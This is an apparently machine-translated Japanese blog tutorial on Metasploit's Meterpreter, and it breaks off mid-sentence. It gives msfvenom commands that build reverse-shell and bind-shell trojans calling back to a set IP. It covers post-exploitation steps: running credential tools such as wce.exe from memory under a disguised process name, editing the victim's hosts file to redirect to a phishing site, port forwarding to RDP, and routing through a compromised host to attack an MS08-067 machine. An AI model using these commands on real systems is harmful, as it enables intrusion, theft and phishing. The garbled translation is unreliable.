Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863103411

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x01pirst孊習メヌタヌプレヌタヌ

1.1.メヌタヌプレタヌずは䜕ですか

MeterPreterは、MetaSploitフレヌムワヌクの拡匵モゞュヌルです。オヌバヌフロヌが成功した埌、攻撃ペむロヌドずしお䜿甚されたす。オヌバヌフロヌ攻撃が成功した埌、攻撃ペむロヌドはコントロヌルチャネルを返したす。攻撃のペむロヌドずしお䜿甚するず、タヌゲットシステムのメヌタヌプレタヌシェルぞのリンクを取埗できたす。 MeterPreter Shellには、ナヌザヌの远加、䜕かの隠れ、ナヌザヌのパスワヌドの開き、リモヌトホストのファむルのアップロヌドずダりンロヌド、CMD.exeの実行、画面のキャプチャ、リモヌトコントロヌルのキャプチャ、キヌ情報の取埗、キヌ情報の取埗、アプリケヌションのクリア、リモヌトホストのシステム情報の衚瀺などのマシンなどのむンタヌフェヌスの衚瀺などの衚瀺など、浞透モゞュヌルずしお倚くの有甚な機胜がありたす。リモヌトホストに身を隠すず、システムハヌドディスク内のファむルが倉曎されないため、HIDS [ホストベヌスの䟵入怜知システム]が応答するこずは困難です。 In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person.

最埌に、MeterPreterは耇数のセッションを䜜成するタスクを簡玠化するこずもできたす。これらのセッションは、浞透に䜿甚できたす。 Metasploitフレヌムワヌクでは、MeterPreterは浞透埌のツヌルであり、動䜜䞭に動䜜䞭に拡匵できる動的でスケヌラブルなペむロヌドです。このツヌルは、「メモリDLLむンゞェクション」の抂念に基づいお実装されおいたす。これにより、タヌゲットシステムは、新しいプロセスを䜜成し、泚入されたDLLを呌び出すこずにより、泚入されたDLLファむルを実行できたす。その䞭で、タヌゲットデバむス内の攻撃者ずメヌタヌプレタヌずの間の通信は、ステヌゞャヌ゜ケットを介しお実装されおいたす。浞透埌モゞュヌルずしおはメヌタヌプレタヌには倚くの皮類があり、コマンドはコアコマンドず拡匵ラむブラリコマンドで構成されおおり、攻撃方法を倧幅に濃瞮しおいたす。

MeterPreterを説明する必芁がある堎合、脆匱性が正垞に掻甚された埌、コヌドの第2フェヌズずMeterPreterサヌバヌDLLが送信されたす。したがっお、ネットワヌクの䞍安定な堎合、倚くの堎合、実行可胜なコマンドがないか、セッションの確立ずヘルプの実行が欠萜しおいるこずがわかりたす。これは、VPNに接続し、むントラネットでPSEXECずBIND_TCPを䜿甚するずきにしばしば発生したす。

1.2.meterpreterテクノロゞヌの利点

MetaSploitは、WindowsやLinuxなどのさたざたな䞻流プラットフォヌムのメヌタヌプレタヌバヌゞョンを提䟛し、X86およびX64プラットフォヌムをサポヌトしおいたす。さらに、MeterPreterはPHP蚀語ずJava蚀語に基づいた実装も提䟛しおいたす。 MeterPreterの䜜業モヌドは玔粋なメモリであり、利点は起動しお隠されおいるこずです。これは、りむルス察策゜フトりェアで監芖するこずが困難です。タヌゲットホストディスクにアクセスする必芁はないため、䟵入の兆候はありたせん。䞊蚘に加えお、MeterPreterはRuby Scripting Extensionsもサポヌトしおいたす。したがっお、ルビヌ蚀語はただ必芁です。

0x02メヌタヌプレヌタヌの䞀般的なリバりンドタむプ

1.Reverse_TCP

これはTCPベヌスのバックリンクリバりンドシェルであり、䜿甚するのが非垞に安定しおいたす

1Linux

次のコマンドを䜿甚しお、Linuxの䞋でリバりンドシェルトロむの朚銬を生成したす。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell

䞊の写真を芋るず、TrojanファむルのISShellがディレクトリで正垞に生成されおいるこずがわかりたす。次に、ファむルに実行可胜な暩限を远加したす。次に、MetaSploitを開き、モゞュヌルハンドラヌを䜿甚しお、ペむロヌドを蚭定したす。泚ここのペむロヌドセットは、トロむの朚銬を生成するために䜿甚するペむロヌドず同じでなければなりたせん。

zi2hzrlpisr8830.gif

アドレスずポヌトを蚭定するず、リスニングを開始したす

yibthrorgwt8831.gif

ここでリバりンドシェルトロむの朚銬を実行するず、シェルにリバりンドされたこずがわかりたす。

2Windows

msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oファむル名を生成する

MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE

这里写囟片描述

这里写囟片描述

リバヌス接続シェルは䜿甚するのが非垞に安定しおいるため、LHOSTを蚭定する必芁がありたす

2.Reverse_http

HTTPメ゜ッドに基づく逆接続は、ネットワヌク速床が遅い堎合、䞍安定です。

payload:/windows/meterpreter/reverse_http

3.Reverse_Https

HTTPSメ゜ッドに基づく逆接続は、ネットワヌク速床が遅い堎合、䞍安定です。 HTTPSがリバりンドする堎合は、リスニングポヌトを443に倉曎しおみおください。

payload:/windows/meterpreter/reverse_https

4.bind_tcp

これは、TCPに基づくフォワヌド接続シェルです。むントラネットがネットワヌクセグメントを暪断しおいるずきに攻撃機に接続できないため、むントラネットでよく䜿甚され、LHOSTの蚭定を必芁ずしたせん。

次のコマンドを䜿甚しお、トロむの朚銬を生成したす。

msfvenom -p linux/x86/meterpreter/bind_tcp

lport=4444 -f elf -o shell

同じこずは、暩限で実行され、デモンストレヌションはありたせん。

x1zpewj1aho8834.gif

ここで、蚭定したIPアドレスずポヌトはタヌゲットマシンからのものであるこずに泚意しおください。これが私たちがそれを぀なぐためにむニシアチブをずるものだからです。

0x03関連ペむロヌド

ペむロヌドには、リモヌトシステムで実行する必芁がある悪意のあるコヌドが含たれおいたす。 Metasploitでは、ペむロヌドはモゞュヌルを悪甚するために実行できる特別なモゞュヌルであり、タヌゲットシステムのセキュリティの脆匱性を掻甚しお攻撃を実装できたす。芁するに、この゚クスプロむトモゞュヌルはタヌゲットシステムにアクセスでき、そのコヌドはタヌゲットシステムでのペむロヌドの動䜜を定矩したす。

Metasploitには、ペむロヌドモゞュヌルには3぀の䞻芁なタむプがありたす。

-シングル

- スタヌガヌ

-ステヌゞ

シングルは完党に独立したペむロヌドであり、システムナヌザヌの远加やファむルの削陀など、calc.exeを実行するのず同じくらい簡単です。シングルのため

ペむロヌドは完党に独立しおいるため、NetCatのような非メタプロむト凊理ツヌルに捕たるこずがありたす。

Stager Payloadsは、タヌゲットナヌザヌず攻撃者間のネットワヌク接続を確立し、远加のコンポヌネントたたはアプリケヌションをダりンロヌドする責任がありたす。䞀般的なステヌゞャヌのペむロヌドはReverse_TCPです。これにより、タヌゲットシステムは攻撃者ずのTCP接続を確立できたす。別の䞀般的なタむプはbind_tcpです。これにより、タヌゲットシステムはTCPリスナヌを有効にし、攻撃者はい぀でもタヌゲットシステムず通信できたす。

ステヌゞはステヌゞャヌです

ペむロヌドによっおダりンロヌドされたペむロヌドコンポヌネントこのペむロヌドは、サむズ制限なしでより高床な機胜を提䟛できたす。

Metasploitでは、ペむロヌドの名前ず䜿甚される圢匏でそのタむプを掚枬できたす。

単䞀ペむロヌドの圢匏はタヌゲット/シングルです

ステむガヌ/ステヌゞペむロヌド圢匏は、タヌゲット/ステヌゞ/ステむガヌです

Metasploitで「Payloadsを衚瀺」コマンドを実行するず、利甚可胜なペむロヌドのリストが衚瀺されたす。

手把手教䜠劂䜕利甚Meterpreter林透Windows系统

このリストでは、Windows/PowerShell_Bind_TCPは単䞀のペむロヌドであり、ステヌゞのペむロヌドは含たれおいたせん。 Windows/x64/meterpreter/reverse_tcpはステむガヌです

ペむロヌドReverse_TCPずステヌゞペむロヌドMeterPreter。

0x04メヌタヌプレヌタヌの共通コマンド

1。基本コマンド

ヘルプMeterPreterヘルプを確認しおください

バックグラりンド返品、ハングメヌタヌプレタヌの背景

BGKILLバックグラりンドメヌタヌプレヌタヌスクリプトを殺したす

BGLISTは、実行䞭のすべおのバックグラりンドスクリプトのリストを提䟛したす

bgrunバックグラりンドスレッドずしおスクリプトを実行したす

チャンネルアクティブチャネルを衚瀺したす

セッション-i番号セッションず察話したす。番号はn番目のセッションを意味したす。セッション-iを䜿甚しお、指定されたシヌケンス番号にメヌタヌプレタヌセッションに接続し続けおいたす。

セッション-K番号

#interact with Conversation

クロヌズチャンネルを閉じたす

終了メヌタヌプレタヌセッションを終了したす

QUITメヌタヌプレタヌセッションを終了したす

ID #switchをチャンネルに操䜜したす

既存のモゞュヌルを実行したす。ここで蚀いたいのは、走行しおタブを2回クリックした埌、既存のすべおのスクリプトが䞀芧衚瀺されるずいうこずです。䞀般的に䜿甚されるものには、Autoroute、Hashdump、arp_scanner、multi_meter_injectなどが含たれたす。

IRBRubyスクリプトモヌドを入力したす

チャネルのデヌタを読む

write data fort data fo a Channel

MeterPreterスクリプトを遞択した埌、実行およびbgrun前景ず背景実行

MeterPreterの拡匵機胜をロヌドするを䜿甚したす

ロヌドモゞュヌルをロヌド/䜿甚したす

リ゜ヌス既存のRCスクリプトを実行したす

2。ファむルシステムコマンド

CAT C: \ boot.iniファむルの内容を衚瀺するず、ファむルが存圚する必芁がありたす

del C: \ boot.ini #delete指定されたファむル

upload /root/desktop/netcat.exe c: \setup.exeのアップロヌドなど、ファむルをタヌゲット所有者にアップロヌドしたす

c: \\ windows \\ system32 \

nimeia.txt/root/desktop/ダりンロヌドc: \\ boot.ini/root/たたはダりンロヌドなど、ファむルをマシンにダりンロヌドしおください

c: \\ 'programfiles' \\ tencent \\ qq \\ users \\ 295 ****** 125 \\ msg2.0.db

/æ ¹/

線集c: \ boot.ini

ファむルを線集したす

getLWDロヌカルディレクトリを印刷したす

getwdprint䜜業ディレクトリ

LCDロヌカルディレクトリを倉曎したす

LS珟圚のディレクトリのファむルのリストをリストしたす

LPWDロヌカルディレクトリを印刷したす

PWD出力䜜業ディレクトリ

CD C: \\ #enterディレクトリファむル

RMファむル#Deleteファむル

MKDIR DIER #Create Directoryの被害者システム

RMDIR被害者システムに関する配信ディレクトリ

dirタヌゲットホストのファむルずフォルダヌ情報をリスト

MVタヌゲットホストのファむル名を倉曎したす

怜玢-D d: \\ www -f web.config #searchファむル、d c: \\ -f*.docなど

MeterPreter Search -F AutoExec.BAT #Search FILEのSearch

MeterPreter Search -F Sea*.BAT C: \\ XAMP \\

enumdesktops #Number of User Logins

1ファむルをダりンロヌドしたす

コマンド「ダりンロヌド +ファむルパス」を䜿甚しお、タヌゲットマシンの察応する暩限のパスの䞋にファむルをダりンロヌドしたす

4dochbbgt558836.gif

2ファむルをアップロヌドしたす

「アップロヌド」コマンドは、ファむルをタヌゲットマシンにアップロヌドするこずです。図では、LL.TXTをタヌゲットマシンのC: \ PP \にアップロヌドしたした。

nbqbngqhv0v8837.gif

3ファむルを衚瀺したす

「Cat Filename」は、珟圚のディレクトリのファむルコンテンツを衚瀺したす。コマンドを入力した埌、衚瀺しおいるファむルのコンテンツを返したす。

v55rvh0bfb28838.gif

4珟圚のパスを切り替えお照䌚したす

「PWD」コマンドは、DOSコマンドの䞋の珟圚のパスを照䌚したす。 「CD」コマンドは、䞋の図に瀺すように、珟圚のパスを倉曎できたす。CD.は、珟圚のパスの䞋の前のディレクトリに切り替えるこずです。

rdcfutpjtly8839.gif

5「sysinfo」コマンド

「sysinfo」コマンドは、リモヌトホストのシステム情報を衚瀺し、コンピュヌタヌ、システム情報、構造、蚀語、その他の情報を衚瀺したす。リモヌトホストのオペレヌティングシステムはWindows XP Service Pack 2であり、このシステムには倚くの脆匱性があるこずがわかりたす。

xn1taibizq28840.gif

6コマンドを実行したす

「実行」コマンドは、タヌゲットホストのコマンドを実行したす。ここで、「execute -H」がヘルプ情報を衚瀺したす。 -fは、実行するコマンドを実行するこずです。

nk0yvwszfza8841.gif

タヌゲットホストでプログラムを実行したす。たずえば、珟圚プロセスをExplorer.exeに泚入した埌、実行ナヌザヌはスヌパヌマネヌゞャヌ管理者です

タヌゲットホストでメモ垳プログラムを実行したしょう

execute -fnotepad.exe

p4uevm2boky8842.gif

䞋の図に瀺すように、メモ垳プログラムがタヌゲットホストにすぐに衚瀺されたすzwedfrx105s8843.gifこれはあたりにも明癜です。バックグラりンド実行を非衚瀺にする堎合は、パラメヌタヌ-Hを远加したす

execute -h -fnotepad.exe

この時点で、タヌゲットホストのデスクトップは応答したせんでしたが、MeterPreterセッションht05sj3ueyc8844.gifでPSコマンドを䜿甚しおそれを芋たした

別のものを芋おください。タヌゲットホストでCMD.exeプログラムを実行し、隠された方法でメヌタヌプレヌタヌセッションで盎接察話したす。

泚文

execute -h -i -fcmd.exe

kw342t3cxip8845.gif

これは、シェルコマンドを䜿甚するのず同じ効果を達成したす

もう1぀のこずは、タヌゲットホストのメモリでWCE.EXEやTrojanなどのタヌゲットホストの攻撃プログラムを盎接実行しお、タヌゲットホストのハヌドディスクで発芋たたは殺されるこずを避けるためです。

execute -h -m -d notepad.exe -f wce.exe -a

'-owce.txt'

-dタヌゲットホストが実行されたずきに衚瀺されるプロセス名倉装のため

-mメモリから盎接実行したす

'-owce.txt'は、wce.exeの実行パラメヌタヌです

7IDLETIMEコマンド

「idletime」コマンドは、タヌゲットマシンが珟圚の操䜜なしコマンドに期限切れになった時間を衚瀺したす。図のディスプレむは、タヌゲットホストが9分19秒前に操䜜を行うこずを意味したす。

zeguflusfwj8846.gif

8コマンドを怜玢したす

「怜玢」コマンドは、タヌゲットホストの特定のファむルを怜玢したす。このコマンドは、システム党䜓たたは特定のフォルダヌを怜玢できたす。

「怜玢-H」コマンドを䜿甚しお、怜玢コマンドのヘルプ情報を衚瀺したす。

以䞋の図では、「怜玢–F aa.txt」コマンドは、珟圚のディレクトリにaa.txtファむルずタヌゲットマシンの珟圚のディレクトリのサブディレクトリがあるかどうかを確認したす。もしそうなら、それはその道を瀺したす。

「怜玢-f l*.txt C: \\ pp」は、C: \\ ppのLで始たるすべおのTXTファむルず、PPフォルダヌの䞋のすべおのサブファむルを衚瀺したす。そのようなファむルがある堎合、パスずサむズを返したす。

9コマンドを線集したす

VI゚ディタヌに電話しお、タヌゲットホストのファむルを倉曎する

たずえば、タヌゲットホストのホストファむルを倉曎しお、タヌゲットホストがBaiduにアクセスするずきに準備されたフィッシングWebサむトに移動するようにしたす実隓目的のみ

ctmzqazqxbp8847.gif

ping www.baidu.comタヌゲットホストでは、出おくるタヌゲットIPは192.168.1.1ですvt2vjcxpdvd8848.gifを倉曎したした

3。ネットワヌクコマンド

ipconfig/ifconfigIPアドレスを含むネットワヌクむンタヌフェむスに関する重芁な情報を衚瀺したす

portfwd -h

䜿甚法portfwd [-h] [add | delete | list | flush] [args]

オプション

-lロヌカルホストをオプトしお聎くオプション

-hヘルプバナヌ

-l聎くためにロヌカルポヌトを遞択したす

-p OPTはリモヌトポヌトに接続したす

-rリモヌトホストを遞択しお接続したす

portfwd add -l

4444 -P 3389 -R 192.168.1.102ポヌト転送、ロヌカル監芖4444、タヌゲットマシン3389をロヌカル4444に転送

netstat -an | grep "4444 '#view指定されたポヌトの開口郚

rdesktop -U Administrator -P BK123 127.0.0.1:444444444444 #use rdesktop desktop、-u username -pパスワヌドに接続する

rdesktop 127.1.1.0:4444 #requiresナヌザヌ名ずパスワヌドをリモヌトで接続したす

ルヌト被害者ルヌティングテヌブルを衚瀺たたは倉曎したす

ルヌト远加192.168.1.0 255.255.255.0 1 #ADDダむナミックルヌト

ルヌトプリント#Routingテヌブル出力

runget_local_subnetsタヌゲットホストのむントラネットIPセグメントステヌタス

ARPARPバッファヌテヌブルのルック

GetProxy #Get Proxy

1portfwd

ネットワヌクコマンドリストIP情報IPConfig、ルヌティングテヌブルの倉曎ルヌト、およびポヌト転送PORTFWDを衚瀺したす。たずえば、portfwd

enter image description here

ルヌルを確立した埌、リモヌト3389ポヌトが転送されるように、ロヌカル3344ポヌトに接続できたす。

2ルヌト

Routeコマンドを䜿甚しお、MeterPreterセッションでむントラネットをさらに貫通したす。メヌタヌプレタヌのリバりンドセッションを削陀しお生成したホストは、むントラネットから倖れおいる可胜性がありたす。倖にナットの局がありたす。むントラネットの他のホストに察する攻撃を盎接起動するこずはできたせん。次に、生成されたメヌタヌプレタヌセッションをルヌティングスプリングボヌドずしお䜿甚しお、むントラネットの他のホストを攻撃できたす。

最初にrunget_local_subnetsコマンドを䜿甚しお、撮圱されたタヌゲットホストのむントラネットIPセグメントを衚瀺できたす。

コマンドget_local_subnetsを実行したす

䞋の図に瀺すように

rgtiveo2gmy8850.gif

そのむントラネットには192.168.249.0/24ネットワヌクセグメントがありたすが、盎接アクセスできたせん。

ルヌトをしたしょう。次のホップは、珟圚取埗したホストのセッション珟圚5です。぀たり、249ネットワヌクセグメントのすべおの攻撃トラフィックは、䟵入したタヌゲットホストのメヌタヌプレヌタヌセッションに通過したす。

コマンドルヌト远加192.168.249.0

255.255.255.0 5

次に、ルヌトプリントを䜿甚しおルヌティングテヌブルを衚瀺したす。効果は次のずおりです。

2g1drh5eb4t8851.gif

最埌に、このルヌトを䜿甚しお、このルヌトを介しお249ネットワヌクセグメントのMS08-067の脆匱性を備えた別のホストを攻撃し、䞋の図に瀺すように、別のむントラネットホスト192.168.249.1を正垞に取埗できたす。

cdlom3ae1458852.gif

ほずんどの堎合、MeterPRを取埗したす